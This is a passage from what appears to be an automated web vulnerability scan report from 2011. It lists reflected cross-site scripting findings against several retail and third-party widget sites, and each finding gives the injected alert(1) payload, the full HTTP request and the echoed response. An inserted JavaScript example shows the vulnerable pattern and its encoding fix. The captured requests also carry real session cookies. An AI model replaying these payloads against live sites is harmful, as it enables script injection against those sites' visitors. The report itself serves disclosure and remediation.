The value of the site request parameter is copied into a JavaScript rest-of-line comment (//Plugins for site ...). The payload f1893%0aalert(1)//ec5edae4c66 was submitted in the site parameter. The %0a was decoded to a literal line break, so the input was echoed as f1893 followed by alert(1)//ec5edae4c66 on a new line, which ends the comment and places alert(1) in statement position.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Caveat: the capture below is a 500 Internal Server Error whose body continues with the ASP error's HTML markup (<font ...>); a script containing that markup fails to parse, so alert(1) would not run from this exact response. Whether the normal response that carries the same //Plugins for site prologue is affected in the same way is not shown here.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=1402662f1893%0aalert(1)//ec5edae4c66&d_id=bluefly-english HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.bluefly.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDASBBACST=BACHFIHAANHOFIJGPHFLPPDG; HumanClickACTIVE=1305510908159

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 02:03:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 458
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCSDRRBRB=JICDIKHANBIPGCCIIAEHECCG; path=/
Cache-control: private

//Plugins for site 1402662f1893
alert(1)//ec5edae4c66

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2
...[SNIP]...
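
An added example, not code from the report or from SteelHouse or LivePerson, that reproduces the two script-context sinks from 5.38 to 5.41 and shows the encoding that closes them: a JSON-encoded string literal for the single-quoted sturl assignment, and line-terminator stripping for the //Plugins for site comment. The inputs are the captured payloads; the alert recorder stands in for the browser, and the function names are this example's own.

```javascript
// Added example (not from the report or from SteelHouse/LivePerson code).
// Constructed inputs, copied from the 5.38 and 5.41 requests on this page.
const QUERY_5_38 = "get_px=1cb714'-alert(1)-'9f1b1c0493f&aid=9056&cb=1305542500340658&ce=1";
const SITE_5_41 = '1402662f1893\nalert(1)//ec5edae4c66';

// Vulnerable pattern (5.38 to 5.40): the raw query is concatenated into a
// single-quoted literal, so a quote in the data ends the string early.
function sturlVulnerable(query) {
  return "'px.steelhousemedia.com/st?" + query + "'";
}

// Hardened: emit a JSON string literal (quotes, backslashes and control
// characters escaped), then also \u-escape the characters that matter when
// the literal sits in an inline <script> block or in a pre-ES2019 engine.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function sturlHardened(query) {
  return jsStringLiteral('px.steelhousemedia.com/st?' + query);
}

// Vulnerable pattern (5.41): data placed in a // comment; any line terminator
// in the data ends the comment and the rest runs as code.
function prologueVulnerable(siteId) {
  return '//Plugins for site ' + siteId + '\n';
}

// Hardened: strip every JavaScript line terminator, the only thing that can
// end a // comment early.
function prologueHardened(siteId) {
  return '//Plugins for site ' + String(siteId).replace(/[\r\n\u2028\u2029]/g, '') + '\n';
}

// Execute a fragment the way a browser would, with alert() replaced by a recorder.
function runWithAlertSpy(source) {
  const calls = [];
  const result = new Function('alert', source)((x) => { calls.push(x); });
  return { result, alertCalls: calls };
}

console.log(runWithAlertSpy('return (' + sturlVulnerable(QUERY_5_38) + ');').alertCalls); // [ 1 ]
console.log(runWithAlertSpy('return (' + sturlHardened(QUERY_5_38) + ');').alertCalls);   // []
```

The hardened literal round-trips the payload byte for byte (the test below checks this), which is the point of encoding over filtering: the tracking parameters still reach the server unchanged, but as data rather than as code.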

5.42. https://secure.bhphotovideo.com/bnh/controller/home [O parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The value of the O request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49fb3'><script>alert(1)</script>d3fa006fb10 was submitted in the O parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp49fb3'><script>alert(1)</script>d3fa006fb10&A=getpage&Q=Login.jsp HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:18:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:18:26 GMT
Connection: keep-alive
Set-Cookie: TS20403f=6d633c8d60c83f78b51cf537b6a9e4775ba07e5bbdb6173b4dd0f9f2; Path=/
Content-Length: 30790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
<input type="hidden" name="prev_O" value='cart.jsp49fb3'><script>alert(1)</script>d3fa006fb10'/>
...[SNIP]...

5.43. https://secure.bhphotovideo.com/bnh/controller/home [f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The value of the f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd request parameter is copied into the HTML document as plain text between tags. The payload 91394<script>alert(1)</script>a321fbd6cb1 was submitted in that parameter. This input was echoed unmodified in the application's response. Note that the parameter name here is itself the payload from issue 5.44: its "> sequence closes the hidden field's name attribute, which is why the value then lands as text between tags rather than inside the value='...' attribute seen in 5.42. This entry is therefore the same hidden-field sink as 5.42 and 5.44 (both the parameter name and its value are echoed unencoded), not an independent one.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=191394<script>alert(1)</script>a321fbd6cb1 HTTP/1.1
Host: secure.bhphotovideo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.bhphotovideo.com/bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebb73022ddbd=1
Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 11:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 11:09:30 GMT
Connection: keep-alive
Set-Cookie: JSESSIONID=3T6hNRFdMX!-983539603; domain=bhphotovideo.com; path=/
Set-Cookie: cookieID=18171488471305544157963; domain=bhphotovideo.com; expires=Saturday, 03-Jun-2079 14:23:25 GMT; path=/
Set-Cookie: TS20403f=b545291670a393ddc6eb9163287e33afe2a7ac07bec18dbf4dd10530; Path=/
Content-Length: 30967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
</script>bb73022ddbd" value='191394<script>alert(1)</script>a321fbd6cb1'/>
...[SNIP]...

5.44. https://secure.bhphotovideo.com/bnh/controller/home [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.bhphotovideo.com
Path:   /bnh/controller/home

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6d64"><script>alert(1)</script>bb73022ddbd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bnh/controller/home?O=cart.jsp&A=getpage&Q=Login.jsp&f6d64"><script>alert(1)</script>bb73022ddbd=1 HTTP/1.1
Host: secure.bhphotovideo.com
Connection: keep-alive
Referer: http://www.bhphotovideo.com/find/cart.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookieID=18154535221305509932941; JSESSIONID=pfTcNQ5SFQ!-112699937

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Expires: Mon, 16 May 2011 10:20:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 16 May 2011 10:20:49 GMT
Connection: keep-alive
Set-Cookie: TS20403f=269e69a03030dd52b6fccf207c5322ed1be61ea6e18d367e4dd0fa81; Path=/
Content-Length: 30846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><script src="/FrameWork/js/t
...[SNIP]...
<input type="hidden" name="prev_f6d64"><script>alert(1)</script>bb73022ddbd" value='1'/>
...[SNIP]...

5.45. http://sr2.liveperson.net/visitor/addons/deploy.asp [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload 97932%0aalert(1)//3be4a2facd2 was submitted in the site parameter. This input was echoed as 97932
alert(1)//3be4a2facd2
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=5396538397932%0aalert(1)//3be4a2facd2&d_id=toshiba HTTP/1.1
Host: sr2.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16101514677756,d=1305377522

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 459
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Mon, 16 May 2011 10:34:57 GMT
Connection: close

//Plugins for site 5396538397932
alert(1)//3be4a2facd2

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=
...[SNIP]...

5.46. http://sv.liveclicker.net/service/api [var parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sv.liveclicker.net
Path:   /service/api

Issue detail

The value of the var request parameter is copied into the HTML document as plain text between tags. The payload c9387<script>alert(1)</script>63737674e7e was submitted in the var parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/api?method=liveclicker.widget.getList&account_id=311&&dim10=1&status=online&format=json&var=liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e HTTP/1.1
Host: sv.liveclicker.net
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:04 GMT
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Type: application/json;charset=utf-8
Connection: close
Content-Length: 1753

liveclicker.api_res[0]c9387<script>alert(1)</script>63737674e7e = { "widgets" : { "widget" : [ { "widget_id" : "15895", "asset_id" : "27151", "versionNumber" : "1", "title" : "How To Train Your Dog to Sit", "length" : "1:07", "rating" : "0", "views" : "911455", "t
...[SNIP]...

5.47. http://t.p.mybuys.com/webrec/wr.do [ckc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The value of the ckc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f479"><script>alert(1)</script>f3b7e714c62 was submitted in the ckc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=2f479"><script>alert(1)</script>f3b7e714c62&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.armaniexchange.com/category/womens.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B4DF5DD64853B60409638EF60D0B5CE6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=4ADDCC8A6DA08BE89115D16EDFB6D509; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:14:11 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 498

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=2f479"><script>alert(1)</script>f3b7e714c62&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979965478%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758520%22%7D
...[SNIP]...

5.48. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget [jsonpcallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.aisle7.net
Path:   /api/1.0/widgets/general/newswire-widget

Issue detail

The value of the jsonpcallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 62b4f%3balert(1)//1857386a781 was submitted in the jsonpcallback parameter. This input was echoed as 62b4f;alert(1)//1857386a781 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp130551084625262b4f%3balert(1)//1857386a781 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 9d0cadfc-2324-42cd-a008-a68d2528482e
Content-Language: en-us
Hni-Response-Time-Ms: 0
Cache-Control: public
Last-Modified: Wed, 16 Feb 2011 18:25:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 3753

jsonp130551084625262b4f;alert(1)//1857386a781("\u003clink rel=\"StyleSheet\" type=\"text/css\" href=\"http://web.aisle7.net/styles/dynamic/963/10006272/enhanced.css\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/link\u003e\u003cscript type=
...[SNIP]...

5.49. http://www.acehardware.com/category/index.jsp [clickid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The value of the clickid request parameter is copied into an HTML comment. The payload 63471--><script>alert(1)</script>f5bbaf27fb7 was submitted in the clickid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn63471--><script>alert(1)</script>f5bbaf27fb7 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:47:28 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:01:35 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<!-- === Request Query String: categoryId=2568444&clickid=topnav_lawn63471--><script>alert(1)</script>f5bbaf27fb7 -->
...[SNIP]...

5.50. http://www.acehardware.com/category/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69603--><script>alert(1)</script>0d9d386e26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=2568444&clickid=topnav_lawn&69603--><script>alert(1)</script>0d9d386e26=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp?rdir=1A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=TvPJNRQL1JzcpcpJnj2HmqWGjbpjhg5fysv1FyGr3Ccf5w1KDJLQ!376193557; fsr.session={"v":1,"rid":"1305510186434_570135","pv":3,"to":5,"c":"https://www.acehardware.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"f":1305542837486}; __utma=185450681.2052200100.1305510171.1305510171.1305542835.2; __utmc=185450681; __utmb=185450681.2.10.1305542835; fsr.a=1305542839068; s_pers=%20s_nr%3D1305511373000%7C1308103373000%3B%20s_lastvisit%3D1305542825522%7C1400150825522%3B%20gpv_p27%3DHome%2520Page%7C1305544639235%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dgsicace%253D%252526pid%25253DHome%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.acehardware.com/category/index.jsp%2525253FcategoryId%2525253D2568444%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:48:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR240e18041a5b4616591440465b0a0a0304; expires=Saturday, 03-Jun-2079 14:02:13 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 115800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


   <!--Preview TimeZone = 'null' --><!--Preview Ti
...[SNIP]...
<!-- === Request Query String: categoryId=2568444&clickid=topnav_lawn&69603--><script>alert(1)</script>0d9d386e26=1 -->
...[SNIP]...

5.51. http://www.acehardware.com/home/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ba652--><script>alert(1)</script>9557872ffa1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /home/index.jsp?ba652--><script>alert(1)</script>9557872ffa1=1 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.1.10.1305510171; s_pers=%20s_nr%3D1305510172030%7C1308102172030%3B%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20gpv_p27%3DHome%2520Page%7C1305511972080%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:55:32 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 108158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<!-- === Request Query String: ba652--><script>alert(1)</script>9557872ffa1=1 -->
...[SNIP]...

5.52. http://www.acehardware.com/home/index.jsp [rdir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /home/index.jsp

Issue detail

